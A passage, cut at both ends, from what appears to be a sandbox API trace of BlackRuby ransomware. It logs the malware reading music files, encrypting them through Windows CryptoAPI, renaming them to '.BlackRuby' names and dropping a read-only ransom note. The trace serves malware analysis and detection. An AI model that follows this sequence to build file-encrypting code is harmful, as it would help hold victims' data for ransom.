GetLastError () returned 0x5 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x5 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.651] GetLastError () returned 0x12 [0059.651] FindClose (in: hFindFile=0x360e20 | out: hFindFile=0x360e20) returned 1 [0059.651] SetErrorMode (uMode=0x0) returned 0x1 [0059.651] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music", lpFilePart=0x0) returned 0x16 [0059.651] GetLastError () returned 0x12 [0059.651] SetErrorMode (uMode=0x1) returned 0x0 [0059.651] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e20 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x12 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.652] GetLastError () returned 0x12 [0059.652] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.652] GetLastError () returned 0x12 [0059.652] FindClose (in: hFindFile=0x360e20 | out: hFindFile=0x360e20) returned 1 [0059.652] SetErrorMode (uMode=0x0) returned 0x1 [0059.652] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", lpFilePart=0x0) returned 0x23 [0059.652] GetLastError () returned 0x12 [0059.653] SetErrorMode (uMode=0x1) returned 0x0 [0059.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3" (normalized: "c:\\users\\eebsym5\\music\\0p3gi-br.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c3f1cc | out: lpFileInformation=0x1c3f1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c329020, ftCreationTime.dwHighDateTime=0x1d34f25, ftLastAccessTime.dwLowDateTime=0x96a4c630, ftLastAccessTime.dwHighDateTime=0x1d350da, ftLastWriteTime.dwLowDateTime=0x96a4c630, ftLastWriteTime.dwHighDateTime=0x1d350da, nFileSizeHigh=0x0, nFileSizeLow=0x5dce)) returned 1 [0059.653] GetLastError () returned 0x12 [0059.653] SetErrorMode (uMode=0x0) returned 0x1 [0059.653] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", lpFilePart=0x0) returned 0x23 [0059.653] GetLastError () returned 0x12 [0059.653] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", lpFilePart=0x0) returned 0x23 [0059.653] GetLastError () returned 0x12 [0059.653] SetErrorMode (uMode=0x1) returned 0x0 [0059.653] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3" (normalized: "c:\\users\\eebsym5\\music\\0p3gi-br.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.653] GetLastError () returned 0x0 [0059.653] GetFileType (hFile=0x184) returned 0x1 [0059.653] SetErrorMode (uMode=0x0) returned 0x1 [0059.653] GetFileType (hFile=0x184) returned 0x1 [0059.653] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5dce [0059.653] GetLastError () returned 0x0 [0059.653] ReadFile (in: hFile=0x184, lpBuffer=0x1c40db8, nNumberOfBytesToRead=0x5dce, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c40db8*, lpNumberOfBytesRead=0x18ed84*=0x5dce, lpOverlapped=0x0) returned 1 [0059.654] GetLastError () returned 0x0 [0059.654] CloseHandle (hObject=0x184) returned 1 [0059.654] GetLastError () returned 0x0 [0059.654] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", lpFilePart=0x0) returned 0x23 [0059.654] GetLastError () returned 0x0 [0059.654] SetErrorMode (uMode=0x1) returned 0x0 [0059.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3" (normalized: "c:\\users\\eebsym5\\music\\0p3gi-br.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c329020, ftCreationTime.dwHighDateTime=0x1d34f25, ftLastAccessTime.dwLowDateTime=0x96a4c630, ftLastAccessTime.dwHighDateTime=0x1d350da, ftLastWriteTime.dwLowDateTime=0x96a4c630, ftLastWriteTime.dwHighDateTime=0x1d350da, nFileSizeHigh=0x0, nFileSizeLow=0x5dce)) returned 1 [0059.654] GetLastError () returned 0x0 [0059.654] SetErrorMode (uMode=0x0) returned 0x1 [0059.654] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0059.654] GetLastError () returned 0x0 [0059.683] CryptImportKey (in: hProv=0x37c680, pbData=0x1ca6ce8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0059.683] GetLastError () returned 0x0 [0059.683] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.683] GetLastError () returned 0x0 [0059.689] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0059.689] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1cd3d34*=0x1, dwFlags=0x0) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1cd3d00, dwFlags=0x0) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd3d7c*, pdwDataLen=0x18ed74*=0x5ec0, dwBufLen=0x5ec0 | out: pbData=0x1cd3d7c*, pdwDataLen=0x18ed74*=0x5ec0) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdfb28*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cdfb28*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cdfb58*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cdfb58*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.689] GetLastError () returned 0x0 [0059.689] CryptDestroyKey (hKey=0x360d20) returned 1 [0059.689] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.689] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", lpFilePart=0x0) returned 0x23 [0059.689] GetLastError () returned 0x0 [0059.689] SetErrorMode (uMode=0x1) returned 0x0 [0059.689] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3" (normalized: "c:\\users\\eebsym5\\music\\0p3gi-br.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.690] GetLastError () returned 0xb7 [0059.690] GetFileType (hFile=0x184) returned 0x1 [0059.690] SetErrorMode (uMode=0x0) returned 0x1 [0059.690] GetFileType (hFile=0x184) returned 0x1 [0059.691] CloseHandle (hObject=0x184) returned 1 [0059.691] GetLastError () returned 0xb7 [0059.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3", lpFilePart=0x0) returned 0x23 [0059.691] GetLastError () returned 0xb7 [0059.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_VXo25cyuF19hMi2PfWMsuvwhzEeMjBoQ108p.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_VXo25cyuF19hMi2PfWMsuvwhzEeMjBoQ108p.BlackRuby", lpFilePart=0x0) returned 0x4f [0059.691] GetLastError () returned 0xb7 [0059.691] SetErrorMode (uMode=0x1) returned 0x0 [0059.691] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3" (normalized: "c:\\users\\eebsym5\\music\\0p3gi-br.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c329020, ftCreationTime.dwHighDateTime=0x1d34f25, ftLastAccessTime.dwLowDateTime=0x96a4c630, ftLastAccessTime.dwHighDateTime=0x1d350da, ftLastWriteTime.dwLowDateTime=0x2bc67e20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5ed0)) returned 1 [0059.691] GetLastError () returned 0xb7 [0059.692] SetErrorMode (uMode=0x0) returned 0x1 [0059.692] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\0P3GI-br.mp3" (normalized: "c:\\users\\eebsym5\\music\\0p3gi-br.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_VXo25cyuF19hMi2PfWMsuvwhzEeMjBoQ108p.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_vxo25cyuf19hmi2pfwmsuvwhzeemjboq108p.blackruby")) returned 1 [0059.692] GetLastError () returned 0xb7 [0059.692] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.692] GetLastError () returned 0xb7 [0059.692] SetErrorMode (uMode=0x1) returned 0x0 [0059.693] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.693] GetLastError () returned 0x0 [0059.693] GetFileType (hFile=0x184) returned 0x1 [0059.693] SetErrorMode (uMode=0x0) returned 0x1 [0059.693] GetFileType (hFile=0x184) returned 0x1 [0059.694] CloseHandle (hObject=0x184) returned 1 [0059.694] GetLastError () returned 0x0 [0059.694] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.694] GetLastError () returned 0x0 [0059.694] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.694] GetLastError () returned 0x0 [0059.694] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", lpFilePart=0x0) returned 0x24 [0059.694] GetLastError () returned 0x0 [0059.694] SetErrorMode (uMode=0x1) returned 0x0 [0059.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3" (normalized: "c:\\users\\eebsym5\\music\\2 jio-bcy.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1d0e4d4 | out: lpFileInformation=0x1d0e4d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77761460, ftCreationTime.dwHighDateTime=0x1d35096, ftLastAccessTime.dwLowDateTime=0xa98aefd0, ftLastAccessTime.dwHighDateTime=0x1d3536a, ftLastWriteTime.dwLowDateTime=0xa98aefd0, ftLastWriteTime.dwHighDateTime=0x1d3536a, nFileSizeHigh=0x0, nFileSizeLow=0x10d2b)) returned 1 [0059.695] GetLastError () returned 0x0 [0059.695] SetErrorMode (uMode=0x0) returned 0x1 [0059.695] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", lpFilePart=0x0) returned 0x24 [0059.695] GetLastError () returned 0x0 [0059.695] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", lpFilePart=0x0) returned 0x24 [0059.695] GetLastError () returned 0x0 [0059.695] SetErrorMode (uMode=0x1) returned 0x0 [0059.695] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3" (normalized: "c:\\users\\eebsym5\\music\\2 jio-bcy.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.695] GetLastError () returned 0x0 [0059.695] GetFileType (hFile=0x184) returned 0x1 [0059.695] SetErrorMode (uMode=0x0) returned 0x1 [0059.695] GetFileType (hFile=0x184) returned 0x1 [0059.695] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x10d2b [0059.695] GetLastError () returned 0x0 [0059.695] ReadFile (in: hFile=0x184, lpBuffer=0x1d10274, nNumberOfBytesToRead=0x10d2b, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d10274*, lpNumberOfBytesRead=0x18ed84*=0x10d2b, lpOverlapped=0x0) returned 1 [0059.696] GetLastError () returned 0x0 [0059.696] CloseHandle (hObject=0x184) returned 1 [0059.696] GetLastError () returned 0x0 [0059.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", lpFilePart=0x0) returned 0x24 [0059.696] GetLastError () returned 0x0 [0059.696] SetErrorMode (uMode=0x1) returned 0x0 [0059.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3" (normalized: "c:\\users\\eebsym5\\music\\2 jio-bcy.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77761460, ftCreationTime.dwHighDateTime=0x1d35096, ftLastAccessTime.dwLowDateTime=0xa98aefd0, ftLastAccessTime.dwHighDateTime=0x1d3536a, ftLastWriteTime.dwLowDateTime=0xa98aefd0, ftLastWriteTime.dwHighDateTime=0x1d3536a, nFileSizeHigh=0x0, nFileSizeLow=0x10d2b)) returned 1 [0059.696] GetLastError () returned 0x0 [0059.696] SetErrorMode (uMode=0x0) returned 0x1 [0059.767] CryptImportKey (in: hProv=0x37c790, pbData=0x1b8ddd4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ae0) returned 1 [0059.767] GetLastError () returned 0x0 [0059.767] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.767] GetLastError () returned 0x0 [0059.772] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.772] GetLastError () returned 0x0 [0059.772] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0059.772] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.772] GetLastError () returned 0x0 [0059.772] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1bbae20*=0x1, dwFlags=0x0) returned 1 [0059.772] GetLastError () returned 0x0 [0059.772] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1bbadec, dwFlags=0x0) returned 1 [0059.772] GetLastError () returned 0x0 [0059.772] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bbae68*, pdwDataLen=0x18ed74*=0x10e20, dwBufLen=0x10e20 | out: pbData=0x1bbae68*, pdwDataLen=0x18ed74*=0x10e20) returned 1 [0059.772] GetLastError () returned 0x0 [0059.772] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdcad4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bdcad4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.772] GetLastError () returned 0x0 [0059.773] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bdcb04*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bdcb04*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.773] GetLastError () returned 0x0 [0059.773] CryptDestroyKey (hKey=0x360ae0) returned 1 [0059.773] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.773] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.773] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", lpFilePart=0x0) returned 0x24 [0059.773] GetLastError () returned 0x0 [0059.773] SetErrorMode (uMode=0x1) returned 0x0 [0059.773] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3" (normalized: "c:\\users\\eebsym5\\music\\2 jio-bcy.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.774] GetLastError () returned 0xb7 [0059.775] GetFileType (hFile=0x184) returned 0x1 [0059.775] SetErrorMode (uMode=0x0) returned 0x1 [0059.775] GetFileType (hFile=0x184) returned 0x1 [0059.776] CloseHandle (hObject=0x184) returned 1 [0059.776] GetLastError () returned 0xb7 [0059.776] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3", lpFilePart=0x0) returned 0x24 [0059.776] GetLastError () returned 0xb7 [0059.776] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_IOqF0gYjadp1obNAonZ8RsMIDelLaXBKBZAkiI3uz2q.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_IOqF0gYjadp1obNAonZ8RsMIDelLaXBKBZAkiI3uz2q.BlackRuby", lpFilePart=0x0) returned 0x56 [0059.776] GetLastError () returned 0xb7 [0059.776] SetErrorMode (uMode=0x1) returned 0x0 [0059.776] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3" (normalized: "c:\\users\\eebsym5\\music\\2 jio-bcy.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77761460, ftCreationTime.dwHighDateTime=0x1d35096, ftLastAccessTime.dwLowDateTime=0xa98aefd0, ftLastAccessTime.dwHighDateTime=0x1d3536a, ftLastWriteTime.dwLowDateTime=0x2bd26500, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10e30)) returned 1 [0059.776] GetLastError () returned 0xb7 [0059.776] SetErrorMode (uMode=0x0) returned 0x1 [0059.776] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\2 JiO-Bcy.mp3" (normalized: "c:\\users\\eebsym5\\music\\2 jio-bcy.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_IOqF0gYjadp1obNAonZ8RsMIDelLaXBKBZAkiI3uz2q.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_ioqf0gyjadp1obnaonz8rsmidellaxbkbzakii3uz2q.blackruby")) returned 1 [0059.777] GetLastError () returned 0xb7 [0059.777] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.777] GetLastError () returned 0xb7 [0059.777] SetErrorMode (uMode=0x1) returned 0x0 [0059.777] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.777] GetLastError () returned 0x5 [0059.778] SetErrorMode (uMode=0x0) returned 0x1 [0059.778] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", lpFilePart=0x0) returned 0x2a [0059.778] GetLastError () returned 0x5 [0059.778] SetErrorMode (uMode=0x1) returned 0x0 [0059.778] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav" (normalized: "c:\\users\\eebsym5\\music\\27asj08cchmgund.wav"), fInfoLevelId=0x0, lpFileInformation=0x1c0aa00 | out: lpFileInformation=0x1c0aa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x609b66a0, ftCreationTime.dwHighDateTime=0x1d3546a, ftLastAccessTime.dwLowDateTime=0x905391a0, ftLastAccessTime.dwHighDateTime=0x1d35191, 